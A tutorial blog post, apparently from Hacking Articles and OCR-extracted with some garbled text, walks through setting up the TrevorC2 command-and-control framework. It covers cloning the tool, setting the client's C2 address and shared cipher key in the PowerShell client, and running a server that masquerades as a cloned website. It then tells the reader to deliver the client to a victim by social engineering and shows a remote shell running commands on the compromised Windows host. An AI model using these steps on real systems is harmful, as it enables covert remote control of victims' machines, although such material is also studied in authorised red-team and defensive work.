TrevorC2 - Command and Control

 $\begin{tabular}{ll} \hline \textbf{m hacking articles.in/trevorc2-command-and-control} \\ \hline \end{tabular}$

Raj February 17, 2019

TrevorC2 is a command and control framework. It is a client/server model that works through a browser masquerading as a C2 tool. It works at different time intervals which makes it almost impossible to be detected. This tool is coded in python but it's also compatible with c#, PowerShell, or any other platform. this is supported by both Windows and macOS along with Linux. It is very easy and convenient to use.

You can download it from

git clone https://github.com/trustedsec/trevorc2

```
oot@kali:~# git clone https://github.com/trustedsec/trevorc2
                                                                ⇦
Cloning into 'trevorc2'...
remote: Enumerating objects: 137, done.
remote: Total 137 (delta 0), reused 0 (delta 0), pack-reused 137
Receiving objects: 100% (137/137), 45.57 KiB | 166.00 KiB/s, done.
Resolving deltas: 100% (78/78), done.
    kali:~# cd trevorc2/
coot@kali:~/trevorc2# ls -la
total 84
                        4096 Jan 29 10:57 .
drwxr-xr-x 3 root root
                        4096 Jan 29 10:57
drwxr-xr-x 39 root root
           1 root root
                         1591 Jan 29 10:57 CHANGELOG.txt
           1 root root
                         278 Jan 29 10:57 CREDITS.txt
           1 root root
                         384 Jan 29 10:57 Dockerfile
                                    10:57 .git
drwxr-xr-x 8 root root
                         4096 Jan 29
                         2119 Jan 29 10:57 LICENSE.txt
           1 root root
           1 root root
                         7540 Jan 29 10:57 README.md
                           24 Jan 29 10:57 requirements.txt
           1 root root
           1 root root
                         8895 Jan 29 10:57 trevorc2 client.cs
           1 root root
                         6407 Jan 29 10:57 trevorc2 client.ps1
                         7017 Jan 29 10:57 trevorc2_client.py
           1 root root
           1 root root 15247 Jan 29 10:57 trevorc2 server.py
```

Once it's downloaded, open the folder and then open **the trevorc2_server.py** file and change the IP to your localhost IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.

```
# Written by: Dave Kennedy @HackingDave
# GIT: https://github.com/trustedsec
# PowerShell Module by Alex Williams @offsec ginger
# This is the client connection, and only an example. Refer to the readme
# to build your own client connection to the server C2 infrastructure.
# CONFIG CONSTANTS:
# Site used to communicate with (remote TrevorC2 site)
$SITE URL = "http://192.168.1.109<mark>"</mark>
FITHIS IS WHAT PATH WE WANT TO HIT FOR CODE - YOU CAN MAKE THIS ANYTHING EXAMP
$ROOT PATH QUERY = "/"
# THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAM
$SITE_PATH_QUERY = "/images"
# THIS IS THE QUERY STRING PARAMETER USED
$QUERY STRING = "guid="
# STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS
$STUB = "oldcss="
$time_interval1 = 2
$time interval2 = 8
# THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CL
$CIPHER = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget"
# DO NOT CHANGE BELOW THIS LINE
```

Then, start and run the trevorc2 framework.

```
: M '
               М:
                   MMMMMMMMMMM : MMMMMMMMMM :
               М:
              : M '
              :M: .;"MMMMMMMMM":;.
               ::, MMM;.M":::M.; MMM
         ,.; ; ; MMMMMM; : MMMMMMMM: : ; , .
MMM.; ., MMMMMMMM; MMMMMMMM; ., ; . MMM
M':''': MMMMMMMMM; MMMMMMMM: "': M
                : M
                                         ::M
                MMMMMMMM : MMMMMMMM
               :MM''':"" MMMMMMMMMMMM:MMMMMM "": "'MM:
                : MM
      ' MM
                                            ; M:
                ' МММММММММММММММ '
: ММММММММММ ; МММММ :
       : MM. :
                                           MM:
                  MMMMMMM ' MMMMMM '
                                          : MM '
                  "MMMMMM": ; MMMMM"
                                          ; M"
                  """";;;;
                                          М:
                   "MMMMMMMM; . " : MMMMMMMM: ; . "
                    #TrevorForget
TrevorC2 - Legitimate Website Covert Channel
Written by: David Kennedy (@HackingDave)
https://www.trustedsec.com
[*] Cloning website: https://www.google.com
[*] Site cloned successfully.
[*] Starting Trevor C2 Server...
 *] Next, enter the command you want the victim to execute.
 *] Client uses random intervals, this may take a few.
[*] Type help for usage. Example commands, list, interact.
trevorc2>
```

Once the trevorc2 is up and running, change the IP to your localhost IP in **trevorc2.ps1** file.

Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below:

To see the sessions type:

list

And to access this session type:

interact <serial number od session>

```
trevorc2>
 *** Received connection from 192.168.1.105 and hostname DESKTOP-NQM64AS for TrevorC2
trevorc2>list
*** Available TrevorC2 Shells Below ***
Format: <session id> <hostname>:<ipaddress>
1. DESKTOP-NQM64AS:192.168.1.105 (Trevor C2 Established)
trevorc2>interact 1 🛵
[*] Dropping into trevorc2 shell...
[*] Use exit or back to select other shells
DESKTOP-NQM64AS:trevorc2>ipconfig <-
[*] Waiting for command to be executed, be patient, results will be displayed here...
 [*] Received response back from client...
(HOSTNAME: DESKTOP-NQM64AS
CLIENT: 192.168.1.105)
 Vindows IP Configuration
Ethernet adapter Ethernet:
   Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . : fe80::613d:f007:4aa3:b842%3
IPv4 Address . . . . . : 192.168.1.105
Subnet Mask . . . . . . : 255.255.255.0
Default Gateway . . . . . : 192.168.1.1
Ethernet adapter VMware Network Adapter VMnet1:
   Connection-specific DNS Suffix .:
   Link-local IPv6 Address . . . . : fe80::90d0:4c4b:d967:4626%8
   IPv4 Address. . . . . . . . . . . : 192.168.10.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . .
Ethernet adapter VMware Network Adapter VMnet8:
```

Author: **Kavish Tyagi** is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact <u>here</u>